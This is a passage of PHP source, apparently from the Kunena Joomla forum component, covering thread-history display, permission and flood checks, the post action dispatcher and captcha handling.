FROM #__kunena_messages WHERE thread={$this->_db->Quote($this->msg_cat->thread)}" ); $result = $this->_db->loadObject (); KunenaError::checkDatabaseError(); $threadPages = ceil ( $result->totalmessages / $this->config->messages_per_page ); //construct a useable URL (for plaintext - so no & encoding!) jimport ( 'joomla.environment.uri' ); $uri = & JURI::getInstance ( JURI::base () ); $LastPostUrl = $uri->toString ( array ('scheme', 'host', 'port' ) ) . str_replace ( '&', '&', CKunenaLink::GetThreadPageURL ( 'view', $this->catid, $this->msg_cat->thread, $threadPages, $this->config->messages_per_page, $this->id ) ); $message->emailToSubscribers($LastPostUrl, $this->config->allowsubscriptions, $this->config->mailmod, $this->config->mailadmin); CKunenaTools::modifyCategoryStats($this->id, $this->msg_cat->parent, $this->msg_cat->time,$this->msg_cat->catid); } } $this->_app->redirect ( CKunenaLink::GetMessageURL ( $this->id, $this->catid, 0, false ), $success_msg ); } function hasThreadHistory() { if (! $this->config->showhistory || $this->id == 0) return false; return true; } function displayThreadHistory() { if (! $this->config->showhistory || $this->id == 0) return; //get all the messages for this thread $query = "SELECT m.*, t.* FROM #__kunena_messages AS m LEFT JOIN #__kunena_messages_text AS t ON m.id=t.mesid WHERE thread='{$this->msg_cat->thread}' AND hold='0' ORDER BY time DESC"; $this->_db->setQuery ( $query, 0, $this->config->historylimit ); $this->messages = $this->_db->loadObjectList (); if (KunenaError::checkDatabaseError()) return; $this->replycount = count($this->messages); //get attachments $mesids = array(); foreach ($this->messages as $mes) { $mesids[]=$mes->id; } $mesids = implode(',', $mesids); require_once(KUNENA_PATH_LIB.DS.'kunena.attachments.class.php'); $attachments = CKunenaAttachments::getInstance (); $this->attachmentslist = $attachments->get($mesids); $this->subject = $this->msg_cat->subject; CKunenaTools::loadTemplate ( '/editor/history.php' ); } public function getNumLink($mesid ,$replycnt) { if ($this->config->ordering_system == 'replyid') { $this->numLink = CKunenaLink::GetSamePageAnkerLink( $mesid, '#' .$replycnt ); } else { $this->numLink = CKunenaLink::GetSamePageAnkerLink ( $mesid, '#' . $mesid ); } return $this->numLink; } protected function getAuthorName() { if (! $this->my->id) { $name = ''; } else { $name = $this->config->username ? $this->my->username : $this->my->name; } return $name; } protected function moderatorProtection() { if (! CKunenaTools::isModerator ( $this->my->id, $this->catid )) { $this->_app->enqueueMessage ( JText::_ ( 'COM_KUNENA_POST_NOT_MODERATOR' ), 'notice' ); return true; } return false; } protected function tokenProtection($method='post') { // get the token put in the message form to check that the form has been valided successfully if (JRequest::checkToken ($method) == false) { $this->_app->enqueueMessage ( JText::_ ( 'COM_KUNENA_ERROR_TOKEN' ), 'error' ); return true; } return false; } protected function lockProtection() { if ($this->msg_cat && $this->msg_cat->locked && ! CKunenaTools::isModerator ( $this->my->id, $this->catid )) { if ($this->msg_cat->catlocked) $this->_app->enqueueMessage ( JText::_ ( 'COM_KUNENA_POST_ERROR_CATEGORY_LOCKED' ), 'error' ); else $this->_app->enqueueMessage ( JText::_ ( 'COM_KUNENA_POST_ERROR_TOPIC_LOCKED' ), 'error' ); return true; } return false; } public function isUserBanned() { $profile = KunenaFactory::getUser(); $banned = $profile->isBanned(); if ($banned) { kimport('userban'); $banned = KunenaUserBan::getInstanceByUserid($profile->userid, true); if (!$banned->isLifetime()) { require_once(KPATH_SITE.'/lib/kunena.timeformat.class.php'); $this->_app->enqueueMessage ( JText::sprintf ( 'COM_KUNENA_POST_ERROR_USER_BANNED_NOACCESS_EXPIRY', CKunenaTimeformat::showDate($banned->expiration)), 'error' ); $this->redirectBack(); return true; } else { $this->_app->enqueueMessage ( JText::_ ( 'COM_KUNENA_POST_ERROR_USER_BANNED_NOACCESS' ), 'error' ); $this->redirectBack(); return true; } } return false; } protected function isIPBanned() { // Disabled for now.. return false; kimport('userban'); $banned = KunenaUserBan::getInstanceByIP($_SERVER['REMOTE_ADDR']); if ( $banned ) { if (!$banned->isLifetime()) { require_once(KPATH_SITE.'/lib/kunena.timeformat.class.php'); $this->_app->enqueueMessage ( JText::sprintf ( 'COM_KUNENA_POST_ERROR_IP_BANNED_NOACCESS_EXPIRY', CKunenaTimeformat::showDate( $banned->expiration) ), 'error' ); $this->redirectBack(); return true; } else { $this->_app->enqueueMessage ( JText::_ ( 'COM_KUNENA_POST_ERROR_IP_BANNED_NOACCESS' ), 'error' ); $this->redirectBack(); return true; } } return false; } public function floodProtection() { // Flood protection $ip = $_SERVER ["REMOTE_ADDR"]; if ($this->config->floodprotection && ! CKunenaTools::isModerator ( $this->my->id, $this->catid )) { $this->_db->setQuery ( "SELECT MAX(time) FROM #__kunena_messages WHERE ip={$this->_db->Quote($ip)}" ); $lastPostTime = $this->_db->loadResult (); if (KunenaError::checkDatabaseError()) return false; if ($lastPostTime + $this->config->floodprotection > CKunenaTimeformat::internalTime ()) { echo JText::_ ( 'COM_KUNENA_POST_TOPIC_FLOOD1' ) . ' ' . $this->config->floodprotection . ' ' . JText::_ ( 'COM_KUNENA_POST_TOPIC_FLOOD2' ) . '<br />'; echo JText::_ ( 'COM_KUNENA_POST_TOPIC_FLOOD3' ); return true; } } return false; } function displayAttachments($attachments) { $this->attachments = $attachments; CKunenaTools::loadTemplate('/view/message.attachments.php'); } function display() { if (! $this->allow) return; if ($this->action == "post") { $this->post (); return; } else if ($this->action == "cancel") { $this->_app->enqueueMessage ( JText::_ ( 'COM_KUNENA_SUBMIT_CANCEL' ) ); return; } switch ($this->do) { case 'new' : $this->newtopic ( $this->do ); break; case 'reply' : case 'quote' : $this->reply ( $this->do ); break; case 'edit' : $this->edit (); break; case 'editpostnow' : $this->editpostnow (); break; case 'delete' : $this->delete (); break; case 'undelete' : $this->undelete (); break; case 'deletethread' : $this->deletethread (); break; case 'moderate' : $this->moderate (); break; case 'moderatethread' : $this->moderate ('',true); break; case 'merge' : $this->moderate ('modmergemessage',false); break; case 'move' : $this->moderate ('modmovemessage',false); break; case 'split' : $this->moderate ('modsplitmultpost',false); break; case 'movetopic' : $this->moderate ('modmovetopic',true); break; case 'mergetopic' : $this->moderate ('modmergetopic',true); break; case 'domoderate' : $this->domoderate (); break; case 'permdelete' : $this->permdelete(); break; case 'subscribe' : $this->subscribe (); break; case 'unsubscribe' : $this->unsubscribe (); break; case 'favorite' : $this->favorite (); break; case 'unfavorite' : $this->unfavorite (); break; case 'sticky' : $this->sticky (); break; case 'unsticky' : $this->unsticky (); break; case 'lock' : $this->lock (); break; case 'unlock' : $this->unlock (); break; case 'approve' : $this->approve (); break; } } function setTitle($title) { $this->document->setTitle ( $title . ' - ' . $this->config->board_title ); } public function hasCaptcha() { if ($this->config->captcha == 1 && $this->my->id < 1) return true; return false; } public function displayCaptcha() { if (! $this->hasCaptcha ()) return; $dispatcher = &JDispatcher::getInstance(); $results = $dispatcher->trigger( 'onCaptchaRequired', array( 'kunena.post' ) ); if (! JPluginHelper::isEnabled ( 'system', 'captcha' ) || !$results[0] ) { echo JText::_ ( 'COM_KUNENA_CAPTCHA_NOT_CONFIGURED' ); return; } if ($results[0]) { $dispatcher->trigger( 'onCaptchaView', array( 'kunena.post', 0, '', '<br />' ) ); } } /** * Escapes a value for output in a view script. * * If escaping mechanism is one of htmlspecialchars or htmlentities, uses * {@link $_encoding} setting. * * @param mixed $var The output to escape. * @return mixed The escaped value. */ function escape($var) { return htmlspecialchars($var, ENT_COMPAT, 'UTF-8'); } public function verifyCaptcha() { if (! $this->hasCaptcha ()) return; $dispatcher = &JDispatcher::getInstance(); $results = $dispatcher->trigger( 'onCaptchaRequired', array( 'kunena.post' ) ); if (! JPluginHelper::isEnabled ( 'system', 'captcha' ) || !$results[0]) { $this->_app->enqueueMessage ( JText::_ ( 'COM_KUNENA_CAPTCHA_CANNOT_CHECK_CODE' ), 'error' ); $this->redirectBack (); } if ( $results[0] ) { $captchaparams = array( JRequest::getVar( 'captchacode', '', 'post' ) , JRequest::getVar( 'captchasuffix', '', 'post' ) , JRequest::getVar( 'captchasessionid', '', 'post' )); $results = $dispatcher->trigger( 'onCaptchaVerify', $captchaparams ); if ( ! $results[0] ) { $this->_app->enqueueMessage ( JText::_ ( 'COM_KUNENA_CAPTCHACODE_DO_NOT_MATCH' ), 'error' ); $this->redirectBack (); return false; } } } function redirectBack() { $httpReferer = JRequest::getVar ( 'HTTP_REFERER', JURI::base ( true ), 'server' ); $this->_app->redirect ( $httpReferer ); } }